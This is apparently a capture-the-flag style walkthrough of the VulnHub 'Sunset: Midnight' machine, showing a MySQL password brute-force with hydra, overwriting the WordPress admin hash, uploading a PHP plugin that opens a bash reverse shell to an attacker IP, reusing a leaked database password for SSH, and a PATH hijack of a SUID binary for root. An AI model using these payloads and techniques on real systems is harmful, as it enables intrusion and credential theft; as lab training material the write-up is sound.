Introduction

Difficulty: Intermediate
Important!: Before auditing this machine make sure you add the host “sunset-midnight” to your /etc/hosts file, otherwise it may not work as expected.

This is SUNSET: MIDNIGHT from vulnhub.

Ports

This box has:

  1. SSH on port 22,
  2. HTTP on port 80, and
  3. MariaDB (MySQL) on 3306.

HTTP

We have one disallowed entry in robots.txt: wp-admin. So we know we’re running Wordpress.

root@kali:/opt/vulnhub/midnight# wpscan -e --url http://sunset-midnight

wpscan gets us one user admin. I start a password attack, but it’s not getting anywhere. In the meantime:

MySQL

root@kali:/opt/vulnhub/midnight# hydra -l 'root' -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt sunset-midnight mysql
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-23 03:08:47
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 10000 login tries (l:1/p:10000), ~2500 tries per task
[DATA] attacking mysql://sunset-midnight:3306/
[3306][mysql] host: sunset-midnight   login: root   password: robert
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-23 03:08:48

So we quickly get some creds for MySQL, cool. We can login:

root@kali:/opt/vulnhub/midnight# mysql --host=192.168.1.119 --port 3306 -u root -p

Once we’re in we can get the admin password hash for Wordpress from wp_users:

admin:$P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/

But I can’t crack it with Hashcat. Hmmm - might as well kill that wpscan password attack. There is also a mysql database with a users table, and we can find the hashes for our user root and another user jose.

jose:3AA64DAE22DBC5B7ACC28062EB18EFB7046D808C

Unfortunately I can’t crack the jose hash either!

What I can do is change the hash for admin in the wp_users table:

MariaDB [wordpress_db]> UPDATE wp_users SET user_pass = '$P$BusK8xRCOLbSKorQVUvb4/EQA.FOQj.' WHERE user_login = 'admin';

The hash above is for the password none.

Wordpress

With the password for the admin user changed, I can log in to wp-admin. Once there, I upload a new plugin in zip format that is actually a reverse shell. The unzipped version looks like this:

root@kali:/opt/vulnhub/midnight# cat ../kbvuln/rev-plugin.php 
<?php

/**
* Plugin Name: Reverse Shell Plugin  
* Plugin URI:  
* Description: Reverse Shell Plugin  
* Version: 1.0  
* Author: Vince Matteo  
* Author URI: http://www.sevenlayers.com  
*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.77/1234 0>&1'");
?>

Once uploaded and activated, we can catch the shell and we’re on the box.

No way, Jose

I run linpeas, because I always run linpeas. Even though I could have found it myself, it gives me this:

[+] Searching Wordpress wp-config.php files
wp-config.php files found:
/var/www/html/wordpress/wp-config.phpdefine( 'DB_NAME', 'wordpress_db' );
define( 'DB_USER', 'jose' );
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );
define( 'DB_HOST', 'localhost' );

No wonder I couldn’t crack the hash. Anyway, this is also the SSH password for jose.

Root

As jose, enumeration turns up an unusual SUID binary:

jose@midnight:/dev/shm$ file /usr/bin/status
/usr/bin/status: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=0b60ab071f1d8a6295eedb7f6815e957f2936171, not stripped

Disassembling this in Ghidra shows the main method:

undefined8 main(void)

{
  setuid(0);
  setgid(0);
  printf("Status of the SSH server:");
  system("service ssh status");
  return 0;
}

When we run it, we get the message:

jose@midnight:/dev/shm$ service ssh status
-bash: service: command not found

So there is no service binary. Maybe we should make one?

jose@midnight:/dev/shm$ nano service
jose@midnight:/dev/shm# cat service 
#!/bin/bash
/bin/bash

jose@midnight:/dev/shm$ chmod +x service
jose@midnight:/dev/shm$ export PATH=/dev/shm:$PATH
jose@midnight:/dev/shm$ /usr/bin/status
root@midnight:/dev/shm# whoami
root
root@midnight:/dev/shm# cd /root
root@midnight:/root# cat root.txt
ASCII ART REMOVED
db2def9d4ddcb83902b884de39d426e6

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

Thank you whitecr0wz; I enjoyed this one.